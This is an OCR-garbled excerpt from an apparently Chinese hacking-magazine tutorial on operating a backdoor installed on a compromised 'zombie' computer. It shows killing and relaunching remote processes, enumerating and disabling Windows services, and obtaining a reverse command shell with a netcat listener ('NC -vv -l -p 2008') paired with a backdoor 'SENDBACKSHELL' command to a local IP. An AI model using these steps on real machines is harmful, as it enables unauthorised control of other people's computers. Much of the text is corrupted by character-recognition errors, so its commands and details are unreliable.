如发现有乱码，请点击下面链接浏览原文
正文摘录:

图4接下来我们查看一下系统进程，来了解一下肉鸡匕都在运行什么程序(图5)。┗┻┛图5前面是PID，中间为进程，最后为进程运行的文件.我们可以根据PID来终止进程。把资源管理器进程关闭来看肴，输入Psk_lI1828(罔6)。你可以发现远程主机的ExplOrer进程已经被关闭。然后我们可以使用运行指令来重新打开它，输入wINEXECC：＼Wirldows＼EXpIorer(图7)，资源管理器叉重新出现，这里我发现输入某些文件路径的时候文件不能输人后缎名，否则无法执行.有些却可以。蜀图6图7完成进程操作的测试我们来看一F服务的操什输人ENUMSERVICE查看下服务(图8)。图8第一列为服务名称，第二列为服务状态，第j列为服务的显示名，我们可以通过VIEWSERVICE服务名来查看某个服务的具体信息：广…蛐v岫VPCMa~以vPcMa口服务为倒ServiGeIRform~tlon‘8ervlceNameIVPCMaD服务名称DisDlayNamolVirtuaIMachineAddltionsShatedFolderService艟痔显示名称Im8gePath：CProg…FiI—V…tuIMachineAdditions'＼vpcmag…胜务启动文件StartTyDezAutoStart腥务类型CLlrrentstare，Runn}ng瞳务状惑ServiceJnformattonCompleted我们通过CONFIGSERVICEVPCMapDis=blIB来设置服务状态为禁用，当然也可以改变其服务类型，或者删除开肩服务.使用相应命令即可。我们熟悉的界面总归是CmdShe11，来看看反弹shell的操作，先使用NC本地监听一F2008端u(圈9)：NC—vv—I—P2008。在后门输入：SENDBACKSHELL192.188.1.32008同车，之后成功的在本地获得一个CMDshell(图l0)。图g